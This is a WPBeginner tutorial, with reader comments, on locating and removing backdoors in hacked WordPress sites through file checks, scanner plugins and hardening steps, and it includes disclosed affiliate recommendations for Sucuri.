Beginner's Guide for WordPress - Start your WordPress Blog in minutes.
Choosing the Best
WordPress Hosting
How to Easily
Install WordPress
Recommended
WordPress Plugins
View all Guides

How to Find a Backdoor in a Hacked WordPress Site and Fix It

Last updated on by
Elegant Themes
How to Find a Backdoor in a Hacked WordPress Site and Fix It

Time and time again, we have helped users fix their hacked WordPress sites. Most of the time when they reach out to us, they have already cleaned up the site, and the hacker was able to get back in. This happens if you did not clean it up properly, or you did not know what you were looking for. In most cases that we found, there was a backdoor created by the hacker which allowed them to bypass normal authentication. In this article, we will show you how to find a backdoor in a hacked WordPress site and fix it.

What is a Backdoor?

Backdoor is referred to a method of bypassing normal authentication and gaining the ability to remotely access the server while remaining undetected. Most smart hackers always upload the backdoor as the first thing. This allows them to regain access even after you find and remove the exploited plugin. Backdoors often survive the upgrades, so your site is vulnerable until you clean this mess up.

Some backdoors simply allow users to create hidden admin username. Whereas the more complex backdoors can allow the hacker to execute any PHP code sent from the browser. Others have a full fledged UI that allows them to send emails as your server, execute SQL queries, and everything else they want to do.

Backdoor Screenshot

Where is this Code Hidden?

Backdoors on a WordPress install are most commonly stored in the following locations:

  1. Themes – Most likely it is not in the current theme that you are using. Hackers want the code to survive core updates. So if you have the old Kubrick theme sitting in your themes directory, or another inactive theme, then the codes will probably be in there. This is why we recommend deleting all the inactive themes.
  2. Plugins – Plugins are a great place for the hacker to hide the code for three reasons. One because people don’t really look at them. Two because people don’t like to upgrade their plugins, so they survive the upgrades (folks keep them up to date). Three, there are some poorly coded plugins which probably have their own vulnerabilities to begin with.
  3. Uploads Directory – As a blogger, you never ever check your uploads directory. Why would you? You just upload the image, and use it in your post. You probably have thousands of images in the uploads folder divided by year and month. It is very easy for the hacker to upload a backdoor in the uploads folder because it will hide among thousands of media files. Plus you don’t check it regularly. Most folks don’t have a monitoring plugin like Sucuri. Lastly, the uploads directory is writable, so it can work the way it is supposed to. This makes it a great target. A lot of backdoors we find are in there.
  4. wp-config.php – This is also one of the highly targeted files by the hackers. It is also one of the first places most folks are told to look.
  5. Includes Folder – /wp-includes/ folder is another place that we find backdoors. Some hackers will always leave more than one backdoor file. Once they upload one, they will add another backup to ensure their access. Includes folder is another one where most people don’t bother looking.

In all the cases we found, the backdoor was disguised to look like a WordPress file.

For example: in one site we cleaned up, the backdoor was in wp-includes folder, and it was called wp-user.php (this doesn’t exist in the normal install). There is user.php, but no wp-user.php in the /wp-includes/ folder. In another instance, we found a php file named hello.php in the uploads folder. It was disguised as the Hello Dolly plugin. But why the heck is in the uploads folder? D’oh.

It can also use names like wp-content.old.tmp, data.php, php5.php, or something of that sort. It doesn’t have to end with PHP just because it has PHP code in it. It can also be a .zip file. In most cases, these files are encoded with base64 code that usually perform all sort operations (i.e add spam links, add additional pages, redirect the main site to spammy pages, etc).

Now you are probably thinking that WordPress is insecure because it allows for backdoors. You are DEAD WRONG. The current version of WordPress has no known vulnerabilities. Backdoors are not the first step of the hack. It is usually the second step. Often hackers find an exploit in a third-party plugin or script which then gives them access to upload the backdoor. Hint: the TimThumb hack. It can be all sort of things though. For example, a poorly coded plugin can allow user privilege escalation. If your site had open registrations, the hacker can just register for free. Exploit the one feature to gain more privileges (which then allows them to upload the files). In other cases, it could very well be that your credentials were compromised. It could also be that you were using a bad hosting provider. See our recommended list of web hosting.

How to Find and Clean the Backdoor?

Now that you know what a backdoor is, and where it can be found. You need to start looking for it. Cleaning it up is as easy as deleting the file or code. However, the difficult part is finding it. You can start with one of the following malware scanner WordPress plugins. Out of those, we recommend Sucuri (yes it is paid).

You can also use the Exploit Scanner, but remember that base64 and eval codes are also used in plugins. So sometimes it will return a lot of false positives. If you are not the developer of the plugins, then it is really hard for you to know which code is out of its place in the thousands of lines of code. The best thing you can do is delete your plugins directory, and reinstall your plugins from scratch. Yup, this is the only way you can be sure unless you have a lot of time to spend.

Search the Uploads Directory

One of the scanner plugins will find a rogue file in the uploads folder. But if you are familiar with SSH, then you just need to write the following command:

find uploads -name "*.php" -print

There is no good reason for a .php file to be in your uploads folder. The folder is designed for media files in most cases. If there is a .php file that is in there, it needs to go.

Delete Inactive Themes

As we mentioned above, often the inactive themes are targeted. The best thing to do is delete them (yup this includes the default and classic theme). But wait, I didn’t check to see if the backdoor was in there. If it was, then it is gone now. You just saved your time from looking, and you eliminated an extra point of attack.

.htaccess File

Sometimes the redirect codes are being added there. Just delete the file, and it will recreate itself. If it doesn’t, go to your WordPress admin panel. Settings » Permalinks. Click the save button there. It will recreate the .htaccess file.

wp-config.php file

Compare this file with the default wp-config-sample.php file. If you see something that is out of place, then get rid of it.

Database Scan for Exploits and SPAM

A smart hacker will never have just one safe spot. They create numerous ones. Targeting a database full of data is a very easy trick. They can store their bad PHP functions, new administrative accounts, SPAM links, etc in the database. Yup, sometimes you won’t see the admin user in your user’s page. You will see that there are 3 users, and you can only see 2. Chances are you are hacked.

If you don’t know what you are doing with SQL, then you probably want to let one of these scanners do the work for you. Exploit Scanner plugin or Sucuri (paid version) both takes care of that.

Think you have cleaned it? Think again!

Alright so the hack is gone. Phew. Hold on, don’t just relax yet. Open your browser in an incognito mode to see if the hack comes back. Sometimes, these hackers are smart. They will not show the hack to logged in users. Only logged out users see it. Or better yet, try to change your browser’s useragent as Google. Sometimes, the hackers only want to target the search engines. If all looks great, then you are good to go.

Just FYI: if you want to be 100% sure that there is no hack, then delete your site. And restore it to the point where you know that the hack wasn’t there. This may not be an option for everyone, so you have to live on the edge.

How to Prevent Hacks in the Future?

Our #1 advice would be to keep strong backups (VaultPress or BackupBuddy) and start using a monitoring service. Like we said earlier, you cannot possibly monitor everything that goes on your site when you are doing tons of other things. This is why we use Sucuri. It might sound like that we are promoting them. But we are NOT. Yes, we do get an affiliate commission from everyone who sign up for Sucuri, but that is not the reason why we are recommending it. We only recommend products that we use and are quality. Major publications like CNN, USAToday, PC World, TechCrunch, TheNextWeb, and others are also recommending these guys. It is because they are good at what they do.

Read our article on 5 Reasons Why We Use Sucuri to Improve our WordPress Security

Few other things you can do:

  1. Use Strong Passwords – Force strong passwords on your users. Start using a password managing utility like 1Password.
  2. 2-Step Authentication – If your password got compromised, the user would still need to have the verification code from your phone.
  3. Limit Login Attempts – This plugin allows you to lock the user out after X numbers of failed login attempts.
  4. Disable Theme and Plugin Editors – This prevents user escalation issues. Even if the user’s privileges were escalated, they couldn’t modify your theme or plugins using the WP-Admin.
  5. Password Protect WP-Admin – You can password protect the entire directory. You can also limit access by IP.
  6. Disable PHP Execution in Certain WordPress Directories – This disables PHP execution in the upload directories and other directories of your choice. Basically so even if someone was able to upload the file in your uploads folder, they wouldn’t be able to execute it.
  7. Stay UPDATED – Run the latest version of WordPress, and upgrade your plugins.

Lastly, don’t be cheap when it comes to security. We always say that the best security measure is great backups. Please please please keep good regular backups of your site. Most hosting companies DO NOT do this for you. Starting using a reliable solution like BackupBuddy or VaultPress. This way if you ever get hacked, you always have a restore point. Also if you can, just get Sucuri and save yourself all the trouble. They will monitor your site, and clean it up if you ever get hacked. It comes out to be like $3 per month per site if you get the 5 site plan.

We hope that this article helped you. Feel free to leave a comment below if you have something to add :)


Editorial Staff at WPBeginner is a team of WordPress lovers led by Syed Balkhi. Page maintained by Syed Balkhi.

WPBeginner's Video Icon
Our HD-Quality tutorial videos for WordPress Beginners will teach you how to use WordPress to create and manage your own website in about an hour. Get started now »
  • Michael

    Great Post, still relevant. I got malware the other day and downloaded my site to my computer. I sorted the files by “last modified” which showed me the pages that had been compromised.

    I compared these files with backup files and was able to track down the malware!

  • Azman

    Nice post, I recently run exploit scanner and it found many malicious or suspecious codes in my site like eval and base64_decode. What should I do in this case do I need to setup my whole database from starting. I can do this because my site is not full of content.
    But I am not very familiar with php, so help me.

    • http://www.wpbeginner.com/ WPBeginner Support

      Exploit scanner lets you know where it found the malicious code. If it is in a theme or plugin file, then you can simply delete those theme and plugin files. After that you can download and upload fresh copies of those files to your site. If it is in database and you can start fresh then do that. Other wise there are ways to clean the code from database too.

  • Dionisis Karampinis

    Very nice article many thanks! I have used Exploit Scanner and currently im having BPS Security

  • Matthew Baya

    Nice article. I’ve found on infected WP sites they consistently seem to put a file named https.php in the wp-includes folder. I also found on my shared hosting server they will hop from one infected account to find other world readable wp-config.php files in other WP installs and will use the database information there to create admin accounts on other WP installs. Thus I’d add that any one whose been hacked should change their database credentials and also lock down wp-config.php as much as possible, ideally limiting it so only the webserver user (and the owner) can access it.

    I’ve been using wordfence to clean infected sites and have been very happy with is, though I recently found it’s no longer noticing the /wo-includes/https.php file I mentioned earlier. I’ve contacted them about this since i know in the past it did notice these

    • Nora McDougall-Collins

      I recent infection I had to deal with infected all the index.php files.

  • qammar

    Very helpfull and informative article.

    one of my client website/blog was infected with malware was ‘reported attached page’ by google. first I tried sucuri sitecheck tool to identify the infected files/badware but they only show this result of scan

    web site: blog.myclientwebsite.com/
    status: Site blacklisted, malware not identified
    web trust: Site blacklisted.

    This do not any help, as we already know the site is black list and then I scan all the data on domain and found following two files infected

    wp-includes\js\js\cnn.php
    wp-includes\js\js\rconfig.php

    I am posting this for other people to look for these files, if their website is infected and reported as attack page.

    Cheers,
    qammar feroz

    • http://www.wpbeginner.com Editorial Staff

      The free Sucuri scanner doesn’t do server side scanning. If you actually pay for Sucuri, not only it protects you, but they will do the cleanup for you if anything happens.

  • Nora McDougall-Collins

    Thanks for the excellent article! I have passed it along to my web development students through Facebook!

    Also, one of my student’s site was hacked and shut down by the web host for the second time. It looks like he had being doing his database backups. So, it looks like we will have to copy and paste his posts directly into the Dashboard from the database dump. What fun!

    • Nora McDougall-Collins

      Sorry for the incomplete information – he had NOT been doing database backups. So, we will have to dump the database and copy and paste into the new install.

  • Patricio Proaño

    Excellent! Thank’s for the info, very useful!!

  • Pat Fortino

    You don’t have to pay securi anyting to scan your site. You can scan as many sites as you want for free. That scan will tell you where the hacks are.

    • http://www.wpbeginner.com Editorial Staff

      Not quite correct. Yes, they have a free scanner, but it only checks if the hacks have a front-end impact. For example, it will say that you have malware injections in your front-end, but it will NOT tell you where the backdoor is hiding and such. There are times that you might clean up the hacks results, but the backdoor still stays even after the cleanup. Then when it comes back, you are left to wonder why.

  • Andrew

    Nice guide. Have you looked at Wordfence (http://www.wordfence.com/)? I’ve put a lot of customers on to it and they rave about it.

    Cheers,

    Andrew

    • http://www.wpbeginner.com Editorial Staff

      Never needed to try it. Sucuri is highly recommended by many big brands. Having using them for a while, we can say that they are very good.

    • Gautam Doddmani

      thanks i am already using the plugin, eliminated many plugins because of it. real time scans are great and so is its firewall :)

  • Harry Candelario

    this was EXACTLY what I needed!! I’ve been trying to figure out how a hacker kept getting into one of the sites I maintain… it was just this one site, none of my other sites were being hacked. I found it with your help. It was hiding in a Pinterest plugin.
    thanx again